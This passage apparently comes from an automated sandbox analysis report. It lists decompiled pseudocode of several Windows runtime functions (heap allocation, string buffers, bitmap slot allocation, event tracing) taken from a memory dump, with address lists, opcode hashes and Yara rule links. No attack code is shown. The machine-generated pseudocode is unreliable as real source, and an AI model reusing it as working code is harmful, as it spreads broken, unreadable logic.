					_t39 = 0xc0000017;
					L11:
					return E0366D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x3707b10 =  *0x3707b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x370536c; // 0x2bbefc0
					if( *_t51 != 0x3705368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x3705368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x370536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0364A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0364a61c
0x0364a61e
0x0364a623
0x0364a628
0x0364a62b
0x0364a62d
0x0364a648
0x0364a64a
0x0364a64f
0x03689b44
0x0364a6ec
0x0364a6f1
0x0364a6f1
0x0364a655
0x0364a657
0x0364a65a
0x0364a65d
0x0364a662
0x0364a663
0x0364a667
0x0364a668
0x0364a66d
0x0364a706
0x0364a706
0x03689bda
0x03689be6
0x03689beb
0x00000000
0x03689beb
0x0364a679
0x03689b7a
0x00000000
0x03689b7a
0x0364a683
0x0364a6f4
0x0364a6f7
0x0364a6f9
0x0364a6fd
0x0364a6a0
0x0364a6a0
0x0364a6ad
0x0364a6af
0x0364a6b4
0x03689ba7
0x03689bac
0x00000000
0x00000000
0x03689bc6
0x03689bce
0x03689bd1
0x03689bd3
0x03689bd3
0x00000000
0x03689bd1
0x0364a6bd
0x0364a6c3
0x0364a6c6
0x0364a6d2
0x0364a701
0x0364a704
0x00000000
0x0364a704
0x0364a6d4
0x0364a6d6
0x0364a6d9
0x0364a6db
0x0364a6e1
0x0364a6e6
0x0364a6e8
0x0364a6e8
0x0364a6ea
0x00000000
0x0364a6ea
0x0364a688
0x0364a692
0x0364a694
0x0364a699
0x00000000
0x00000000
0x0364a69d
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ea483bff250beab54601bbc8354f7d485c1a63a661b5f647d55c5bb235f427
Instruction ID: 7a1e913cae05580e7ef60f854552cedb7c15039c5e547f0c27761d42eec7e0ba
Opcode Fuzzy Hash: 47ea483bff250beab54601bbc8354f7d485c1a63a661b5f647d55c5bb235f427
Instruction Fuzzy Hash: B2417C79E44205EFCB14DF98C980BAABBF1BB49314F19C169E804AF344C775A901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 03653D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03653D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E03627B60(0, _t61, 0x35f11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E03627B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L03634620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x03653d4c
0x03653d50
0x03653d55
0x03653d5e
0x0368e79a
0x00000000
0x0368e79a
0x03653d68
0x0368e789
0x03653d9d
0x03653da3
0x03653daf
0x03653db5
0x03653dbc
0x03653dc4
0x03653dc9
0x03653dce
0x0368e7ae
0x0368e7ae
0x03653dde
0x03653de2
0x03653de7
0x03653e0d
0x03653e13
0x03653e16
0x03653e1e
0x03653e25
0x03653e28
0x00000000
0x00000000
0x03653e2a
0x03653e2f
0x03653e37
0x03653e37
0x00000000
0x03653e37
0x03653e31
0x00000000
0x03653e31
0x03653e20
0x03653e20
0x03653e35
0x00000000
0x03653de9
0x03653de9
0x03653de9
0x03653dee
0x03653dfd
0x03653dff
0x03653e02
0x03653e05
0x03653e05
0x00000000
0x03653df0
0x03653de7
0x0368e78f
0x0368e794
0x03653d79
0x03653d84
0x03653d89
0x03653d8e
0x00000000
0x0368e7a4
0x03653d96
0x03653d9a
0x00000000
0x03653d9a
0x00000000
0x0368e794
0x03653d6e
0x03653d73
0x00000000
0x0368e7b5
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7d79f555ba90a05d4c8ea5ba9e0bce6a8ef6801df9ab30ff7bf5e2050a23c8a
Instruction ID: 53c536f9bbfdf0f05cce266edf8a1f655b05ec61f1cf2fbb985174c20edf7229
Opcode Fuzzy Hash: b7d79f555ba90a05d4c8ea5ba9e0bce6a8ef6801df9ab30ff7bf5e2050a23c8a
Instruction Fuzzy Hash: 8631AD39A01615DBC724DF29C941B7ABBF5EF49B80B29817EF845CB360E630D841C790

Uniqueness

Uniqueness Score: -1.00%

Function 0363C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0363C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E03637D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E036E8D34(_v8, _t80);
					}
					E03632280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0362FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E036E8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0362FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0365B180();
						if(_a4 != 0) {
							E03632280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0363BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0363BB2D(_t16, _t15);
						E0363B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0362FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0362FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0362FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0363c18d
0x0363c18f
0x0363c191
0x0363c19b
0x0363c1a0
0x0363c1d4
0x0363c1de
0x03682d6e
0x0363c1e4
0x0363c1e4
0x0363c1e4
0x0363c1ec
0x03682d7d
0x03682d7d
0x0363c1f3
0x0363c1ff
0x03682d88
0x03682d8d
0x03682d94
0x03682d94
0x03682d9f
0x03682da4
0x03682dab
0x03682db0
0x03682db2
0x03682db3
0x03682db4
0x03682dbc
0x03682dc3
0x03682dc3
0x0363c205
0x0363c205
0x0363c208
0x0363c20e
0x0363c211
0x0363c216
0x0363c219
0x0363c21f
0x0363c222
0x0363c22c
0x0363c234
0x0363c23a
0x0363c23f
0x0363c245
0x0363c24b
0x0363c251
0x0363c25a
0x0363c276
0x0363c27d
0x0363c27d
0x0363c25c
0x0363c25c
0x00000000
0x0363c25e
0x0363c1a4
0x0363c1aa
0x0363c1b3
0x0363c265
0x0363c26c
0x0363c26c
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 65b0ab5da7831ee5a987f2240f5644af0e2e91168e52102031f0bb89f4e82b1c
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 15315A75A0574ABED704EBB4C890BE9FB64BF47204F08415EE41C5F301DB346A0ADBA8

Uniqueness

Uniqueness Score: -1.00%

Function 03697016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E03697016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x370d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E03696B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E03696B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E03637D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03659AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0365B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L03634620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x03697016
0x0369701e
0x0369702b
0x03697033
0x03697037
0x0369703c
0x0369703e
0x03697041
0x03697045
0x0369704a
0x03697050
0x03697055
0x0369705a
0x03697062
0x03697062
0x0369705a
0x03697064
0x03697064
0x03697067
0x03697071
0x03697096
0x0369709b
0x036970a2
0x036970a6
0x036970a7
0x036970ad
0x036970b3
0x036970b6
0x036970bb
0x036970c3
0x036970c3
0x036970c6
0x036970cd
0x036970dd
0x036970e0
0x036970e2
0x036970e2
0x036970ee
0x03697101
0x036970f0
0x036970f9
0x036970f9
0x0369710a
0x0369710e
0x03697112
0x03697117
0x03697118
0x03697118
0x036970bb
0x0369711d
0x03697123
0x03697131
0x03697131
0x03697136
0x0369713d
0x0369713e
0x0369713f
0x0369714a
0x0369714a
0x03697084
0x03697088
0x00000000
0x0369708e
0x0369708e
0x03697092
0x00000000
0x03697092

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf286c6075e9a0a04957326daf4cbab5416b4d8e43fcc201dd93db0be36a7ed7
Instruction ID: d4d5239e5d915a6ff7f5ae95e508c689b5463587b3e9565b7241ac73ea0ab650
Opcode Fuzzy Hash: bf286c6075e9a0a04957326daf4cbab5416b4d8e43fcc201dd93db0be36a7ed7
Instruction Fuzzy Hash: 5431E2766047419BD720DF28C940A6AB7F9FFC8700F094A2EF8958B790E730E914C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0364A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0364A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x3707b10; // 0x9
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x3707b10 = 8;
					 *0x3707b14 = 0x3707b0c;
					 *0x3707b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0xa
					E0364A990(0x3707b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0364A840(__edx, __ecx, __ecx, _t52, 0x3707b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x3707b10; // 0x9
					_t3 = _t37 + 0x27; // 0x30
					__eflags = _t3 >> 5 -  *0x3707b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x3707b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x30
						_v8 = _t4 >> 5;
						_t50 = L03634620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x3707b18 = _v8;
						_t8 = _t52 + 7; // 0x10
						E0365F3E0(_t50,  *0x3707b14, _t8 >> 3);
						_t28 =  *0x3707b14; // 0x77f07b0c
						__eflags = _t28 - 0x3707b0c;
						if(_t28 != 0x3707b0c) {
							L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x11
						 *0x3707b14 = _t50;
						_t48 = _v12;
						 *0x3707b10 = _t9;
						goto L6;
					}
					 *0x3707b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0364a713
0x0364a714
0x0364a717
0x0364a71d
0x0364a720
0x0364a722
0x0364a727
0x0364a74a
0x0364a754
0x0364a75e
0x0364a768
0x0364a76a
0x0364a773
0x0364a78b
0x0364a790
0x0364a792
0x0364a741
0x0364a741
0x0364a743
0x0364a749
0x0364a749
0x0364a732
0x0364a73a
0x0364a797
0x0364a79d
0x0364a7a3
0x0364a7a9
0x0364a7b6
0x0364a7bc
0x0364a7ca
0x0364a7e0
0x0364a7e2
0x0364a7e4
0x03689bf2
0x00000000
0x03689bf2
0x0364a7ed
0x0364a7f2
0x0364a800
0x0364a805
0x0364a80d
0x0364a812
0x03689c08
0x03689c08
0x0364a818
0x0364a81b
0x0364a821
0x0364a824
0x00000000
0x0364a824
0x0364a7ae
0x00000000
0x0364a7ae
0x0364a73c
0x0364a73e
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a06b838415dbdc67b928090057390df6d0840fa02b34da1367daf1731c79219d
Instruction ID: 5cbe8cca6fe2edd91df74b81c633aa4bff8826e3588189c7143fef9b663682e5
Opcode Fuzzy Hash: a06b838415dbdc67b928090057390df6d0840fa02b34da1367daf1731c79219d
Instruction Fuzzy Hash: 7E31E1B5A00284EFD719EF48D980F29BBFAFB84714F448959E0048B344DB78A941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0361AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0361AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x370d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x3707b9c; // 0x0
					_t53 = L03634620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0365B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0365F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L03626C59(_t53, _t51, _t58) != 0) {
							_t28 = E03645E50(0x35fc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0364B230(_v32, _v28, 0x35fc2d8, 1,  &_v24);
								_t28 = E0361F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0361aa25
0x0361aa29
0x0361aa2d
0x0361aa30
0x0361aa37
0x0361aa3c
0x03674458
0x03674458
0x03674472
0x03674474
0x03674476
0x0361aa64
0x0361aa74
0x0367447c
0x03674483
0x03674492
0x0361aa52
0x0361aa54
0x0361aa5e
0x036744a8
0x036744ad
0x036744af
0x036744b6
0x036744b6
0x036744b9
0x036744bc
0x036744cd
0x036744d3
0x036744d6
0x036744e1
0x036744e1
0x036744e6
0x036744e8
0x036744fb
0x036744fb
0x036744e8
0x00000000
0x0361aa5e
0x03674476
0x0361aa42
0x0361aa46
0x0361aa48
0x0361aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94a849d04898571e704277c388b4bfbaf5b0fac4db5c66608a6af3c4627c5253
Instruction ID: 25b1847b9dd1401211b2732dd246ee1e0e9cbe682042d26e1338f57f612a5b73
Opcode Fuzzy Hash: 94a849d04898571e704277c388b4bfbaf5b0fac4db5c66608a6af3c4627c5253
Instruction Fuzzy Hash: A931F171A00219ABCB11EFA8CE81A7FB7B9FF04700F054069F901EB250EB749921DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 036461A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E036461A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E03645E50(0x35f67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E036E9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0361F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x036461b3
0x036461b5
0x036461bd
0x036461c3
0x036461c7
0x036461d2
0x036461ff
0x036461ff
0x03646201
0x03646207
0x03646207
0x036461d4
0x036461d9
0x00000000
0x00000000
0x036461df
0x036461e2
0x00000000
0x00000000
0x036461e6
0x036461e8
0x036461ee
0x036461ee
0x036461f9
0x0368762f
0x03687632
0x03687635
0x03687639
0x03687640
0x0368766e
0x03687675
0x00000000
0x00000000
0x03687681
0x03687689
0x0368768d
0x03687691
0x03687695
0x03687699
0x036876af
0x036876b5
0x036876b7
0x036876b7
0x036876d7
0x036876dc
0x00000000
0x036876dc
0x036876a2
0x036876a9
0x03687651
0x03687653
0x03687653
0x03687656
0x03687656
0x00000000
0x03687656
0x03687644
0x03687646
0x03687648
0x03687648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74f62b707d4a6769ce045289d116dca0c62a176616776a13b380c2fbaed293e9
Instruction ID: c993ba9e5d16cfdc2d594957a1d4df3293a2e43b73a668e2d3d98e30d6550fd8
Opcode Fuzzy Hash: 74f62b707d4a6769ce045289d116dca0c62a176616776a13b380c2fbaed293e9
Instruction Fuzzy Hash: C1318C71A097018FD324DF1DCA00B2AF7E5FB88B00F194A6DE9989B351E7B0E844CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03654A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E03654A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x370d360 ^ _t62;
				_v8 =  *0x370d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E03632280(_t26, 0x3708608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
